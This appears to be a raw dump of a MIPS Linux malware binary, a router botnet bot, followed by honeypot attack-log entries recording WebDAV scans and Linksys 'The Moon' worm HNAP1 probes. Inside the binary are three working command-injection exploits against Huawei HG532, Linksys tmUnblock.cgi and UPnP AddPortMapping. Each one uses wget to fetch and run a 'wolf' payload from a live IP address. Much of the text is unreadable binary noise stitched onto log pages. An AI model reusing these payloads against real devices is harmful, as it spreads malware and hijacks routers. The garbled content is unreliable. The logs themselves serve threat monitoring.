���!@�'������� ��D !�(! � $����&�����������,�����P���� � '������������X���� � �������L���`�����$�����$���C�����t����Q��������$���� � ��������������`���� � �@�!�����������(���� � ��������������X���� � �@�!�����������t����q��������|����b�����������������b��������
�� !$Q�t<� �! � <�$� �! � 6�6� �! � $�����������L���L�D���C#������\�����D�����P���!�� �C�����L�����C!�Y������ � &����+@����`�`�! � ��������������L���L���!�C#�� ������L�����C!�Y������ � &����+@�������t����@��������t���� � ��������@����������@������������� � ��������@�����<� !�F����! � @(!����������`���� � �@ !��������<
�'�����!'������d���`���\���X������!���!���!����$��$���
'�� �� � ���
���������'����������0��(! ���0!'��8���@ ! � $���� ��@�!����&$�'��@@� $�����< � �"����P���8����"���#���!���d���`���\���X��'��h��������<
�'�����!'���
������$b���
���t���@�! � ��������P��$�����
�����'�� ������������<
�'��`��!'��د�� ���
���������! !$����
���t��@�! � �����������P��<
�'����!'���
������$����
���t���@�! � ��������P��$�����
�����'�� ������������<
�'�����!'��H���������������'�����!��(!$
���
���t���@�! � ��������P����$������� !@� (! � ��������!��������������'�������<
�'�� ��!'��د��$��� ���
���������8���� � ���!���@�
�@�!���!������
��0F���������
�� � $�폼������d� ! � �(!������!+���d&�
@��&� !���$��� ���
�����'��(��������<
�'��P��!'������@��!���D���<���8���4���0���,���(���$��� ���$��������#'�����!���!���H`(!${���
���@�!���t���� � ��������R��$��$��B���!��;$��`�!$����/$����$��$B��C0$&@!��+@��8!�������H��� � �0!���4�&�������t���� � �������$�$����
�C���������
���#��"������
�&��#�
�"��������"�����! � $�������!r!+����&$�&�@���8!4 #��!���D���@���<���8���4���0���,���(���$��� ��!��'��H������������<
�'�����!'���
������$����
���t���@�! � ��������P��$���!���
�����'�� ��������<
�'�� ��!'���
������$����
���t���@�! � ��������P��$���!���
�����'�� ��������<
�'�����!'���
������$����
���t���@�! � ��������P��$�����
�����'�� ������������<
�'��`��!'���
������$����
���t���@�! � ��������P��$�����
�����'�� ������������<
�'�����!'����$��!���(��� �����(!'�����0!���@'��'���$,���
'�� ���t�@�!���@ ! � �������$�����P��@�������!�����
�����!���(���$��� ��'��0��������<
�'��P��!'���
������$F���
���t���@�! � ��������P��$�����
�����'�� ������������<
�'�����!'��د�� ���
�������������!�������@��� ! � �������@�
�������؎�� ��@�!�Q ! � �@�!���A��!$���!��� ���
�����'��(<
�'��`��!'���
������$����
���t���@�! � ��������P��$�����
�����'�� ������������<
�'�����!'���
������$���
���t���@�! � ��������P��$���!���
�����'�� ��������<
�'�����!'��د�� ���
���������!���4���!��(!� ! � $���"������������#��"������"��������"�
������
�"� ������ �"�$������$�"�(���(��,�#�<�"�8��<��8�"�X������X�"�`�#�d��`��d�"�@������@�"�H������H�"�P������P�"�D������D�"�L������L�"�T������T��� ���
�����'��(<
�'�����!'��د�� ���
���������!���4���!��(!� ! � $���"������������"��������"��������"��������"�
������
�"� ������ �"�$���(��,�"�0������4�"�P������T�"�T������X�"�8������<�"�@������D�"�H������L�"�<������@�"�D������H�"�L������P��� ���
�����'��(������������(����.��!��@&1���3�H#1)� ���0#������(!������ !0�� ���8#��8!�0!�������������
������������
$�� $�� ���ଉ�䬊�謋�쬌��������0�����8#��8!�0!����$��$�������������8!����$��$����������������8#0������0#���������(!������ !0����8#��8!�������$��$�������������0!������������<
�'�� ��!'��د��$��� ���
�������������!���!�����!���� � � !�!����������@(!� !@���!���0�� � �������$C����� !@���(! � ��������!���"���@���#���!���$��� ���
����`!��'��(��������!��
�����d���������$c�$B��F�����������!��!������<
�'����!��7��X!����$
���)$
�.���������@�I!�B������0B�@�*��@!������$��)�@�$$���������@�C!�@�i!�c���F8!0b�@��)B�@�������$�����
���$��0b� @������
��HX%%J�)B�@��������������$�$�����������!������������<
�'����!'���,��(�������������� � $�����'����$� �P!�@��$c��a�������� ! � $����@��(!���H$� � ��0!���������������b`����@�$��b`����������� � &�����������
���� � $���������������� � &�����������$���`����b�$����4��`��(!'��� � $�����$� '��$���������E!�D��$c��a�������쯠��$�'��� � ��0!����������b�$���`���
��`$�b�$�����` � $����
�����������<
�'��`��!���
���h�����C�����,���|���C������<
�'��0��!'���������t��(! 0!�� !$����
�����E(+�� !���b�����! � ����$�
���$���C�������!��'�� ��0�����������E�$��$�������!0��@������%�
��CH%<~�4K��<�4J���������"&�'�K!�C&�J$@��$������$���$���$���E�$������`!��������E� ��!��������E���!��������E���!����������������
��!�������g�������$c����������$��$B��������������!����������<
�'�����!'���
���������h���� � ���!����(!���l���
����@ ! �'�� ����<
�'��P��!'��د�� ���
���������$��$B�Y������#�$P��$�� � &��������1��������� ���
�����'��(����<
�'�����!'������
��������<
�'�����!��� ����'9 � ��������������
������'�� ����POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.244.78.187 -l /tmp/binary -r /bins/wolf.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
����UUUV/���POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1����
����������������������POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://104.244.78.187/bins/wolf.mips -O - > /var/kekl;sh/var/kekl`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
� �����@�vkkp����pwckmjckj���pe^~D45�wkhkoa}�pe^~D670=1<1=���pahjape`imj�|g7155��`abeqhp�e`imj���rm~|r���qwav����K|lhsWC<����W6bCuJBw����phNstfk2����cqawp���567012��56701���wqttkvp�<<<<<<��rwpevgei6451����64514246����lD76Hq}@����lmtg715<����lwhsmbmgei��1qt�lk0qoq2ep���
�����
���
���(���,������������������������ �P�������� �Fkqp$Pk$Fqj$E$^kkp�+tvkg+�+a|a���+b`����+tvkg+jap+pgt��+ietw��+tvkg+jap+vkqpa����ewwskv`����+wpepqw����wlahh��ajefha�w}wpai�wl�fel����wpevp��hmjq|wlahh��+fmj+fqw}fk|$SKHB��SKHB>$etthap$jkp$bkqj`�jgkvvagp���kcmj���ajpav��+`ar+sepgl`kc��+`ar+imwg+sepgl`kc�+wfmj+sepgl`kc�+fmj+sepgl`kc��+`[email protected][sepgl`kc�+`[email protected]+sepgl`kc�+`ar+sepgl`kc4�+apg+`abeqhp+sepgl`kc��+apg+sepgl`kc��SKHB`kcapg�g*skhbmkp*|}~��~B��w*skhbmkp*|}~��3�����������������,
��,,��+���+���+��+�+�,����������������������������� ���?��������/bin/sh�sh��-c��/dev/null�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� ������������������`��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������E��E������E
��������������������������������������������������������������������@�����ޭڭ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Ex���������������������������������������9����gt��>Q
NP��a��P�kqj�,�j���H�6��T7������Y�qϑ�I 7��RǤq�)>� O���q�9�N
��N�L�����(��K�ɲ@���KC���S[kA������������E��E��E������� ����E8������������������������������������A<�A `�A `��������������������������������������������E���A���@���@�`�@��@��@���@���E��@�@�@�p�E �@� �E��E<�E@�@��E��@ߠ�@�p�@���@�������������������������������������������������������������������������������������������������������������������@ð�@� �@̀�E��@������@������@���E4�@���@���E��@���EP�@���@�p�@�@�@�0�@�`�@���@a\�@�P�E��@���E`�@��@���@�@�@���@��E��@������@ߠ�@�P�Eh�@�P�E��E��Ep�@���@�\�@
��E(�@���E��E��E8�E��@��@+H�@�D�E��E`�E8�@
��@+h�@
������E8�@���@���Ed�@>������@l�E`�E��@�@�@@D�@���@��@���@���@�0�@� �@���@���@�t�@
��@���E��@T��E��@���@t$�@�@�@�l�@���E0�@���@��@��@� �@�P�@���E��E��@`T�@�p�@��@Đ�@� �E��@4��@��Ep�@~�@�0�E|�@���@�@�@���@�@�@�0�@b������@�@�@ư�@���@�0�����@�@�E��@���@�p�@���E��@� �@�
�@��@
d�@�d�E$�@��@�P�@�h�@z��E��@t��@c��@�@� �@���E��@���E,�@���@��Eh�E4�@ǐ�E��@\�@�
�@�t�@�P�@�l�@�@�@�0�E��@�P�Ed�@�`�@���@���@���@P�@�d�@���@`��@d��@���@
|�@4�@Ѹ�@���@��@���@а�@��E��E��@�\�E0�@�P�@�p�@��@���@�d�@���@��@�P�@���@���@ـ�@���E��E��@���@��.shstrtab�.init�.text�.fini�.rodata�.ctors�.dtors�.data.rel.ro�.data�.got�.sbss�.bss�.mdebug.abi32��������������������������������������������
�������@�����������������������������������@ �� �����������������������������@���������\������������������
�������@� ��� ��@������������������%�������E������������������������,�������E����������������������3�������E����������������������@�������E � ���������������������F������E�����������������������K������E������$������������������Q�������E������������������������V��������������������������������������������������d���������������
WebDAV Fingerprint
[Attack info]
Attacker:
118.24.171.154
Dest. port: 80
Time: 05/10/2019 10:05:21
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian
Description
WebDAV fingerprint attempts.CVE
N/AAuthor
Honerix TeamReference
N/APlugin ID
0d889f9b0eb36ae6dd5d60efbbe9666cGET /webdav/ HTTP/1.1
Host: 123.48.77.22:80
connection: Close
User-Agent: Mozilla/5.0
Resource ( 1 / 0 )
w00tw00t Scanner
[Attack info]
Attacker:
139.155.39.5
Dest. port: 80
Time: 01/10/2019 03:49:07
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Beijing
Linksys "The Moon" Worm
[Attack info]
Attacker:
195.181.189.24
Dest. port: 8080
Time: 30/09/2019 01:02:02
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Campania, Naples (zipcode 80133)
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.0
Content-Length: 345
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2"
Host: 195.195.158.47:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
connection: keep-alive
referer: http://195.195.158.47:8080/
authorization: Basic Og==
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/">
</GetRouterLanSettings2>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
Linksys "The Moon" Worm
[Attack info]
Attacker:
195.181.189.24
Dest. port: 8080
Time: 30/09/2019 01:02:02
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Campania, Naples (zipcode 80133)
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.0
Content-Length: 331
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetWanSettings"
Host: 195.195.158.47:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
connection: keep-alive
referer: http://195.195.158.47:8080/
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWanSettings xmlns="http://purenetworks.com/HNAP1/">
</GetWanSettings>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
Linksys "The Moon" Worm
[Attack info]
Attacker:
195.181.189.24
Dest. port: 80
Time: 30/09/2019 01:01:35
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Campania, Naples (zipcode 80133)
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.0
Content-Length: 337
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetRouterSettings"
Host: 195.195.158.47
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
connection: keep-alive
referer: http://195.195.158.47/
authorization: Basic Og==
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetRouterSettings xmlns="http://purenetworks.com/HNAP1/">
</GetRouterSettings>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
Linksys "The Moon" Worm
[Attack info]
Attacker:
195.181.189.24
Dest. port: 80
Time: 30/09/2019 01:01:35
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Campania, Naples (zipcode 80133)
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.0
Content-Length: 331
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetWanSettings"
Host: 195.195.158.47
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
connection: keep-alive
referer: http://195.195.158.47/
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWanSettings xmlns="http://purenetworks.com/HNAP1/">
</GetWanSettings>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
Linksys "The Moon" Worm
[Attack info]
Attacker:
195.181.189.24
Dest. port: 80
Time: 30/09/2019 01:01:34
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Campania, Naples (zipcode 80133)
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.0
Content-Length: 329
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady"
Host: 195.195.158.47
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
connection: keep-alive
referer: http://195.195.158.47/
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<IsDeviceReady xmlns="http://purenetworks.com/HNAP1/">
</IsDeviceReady>
</soap:Body>
</soap:Envelope>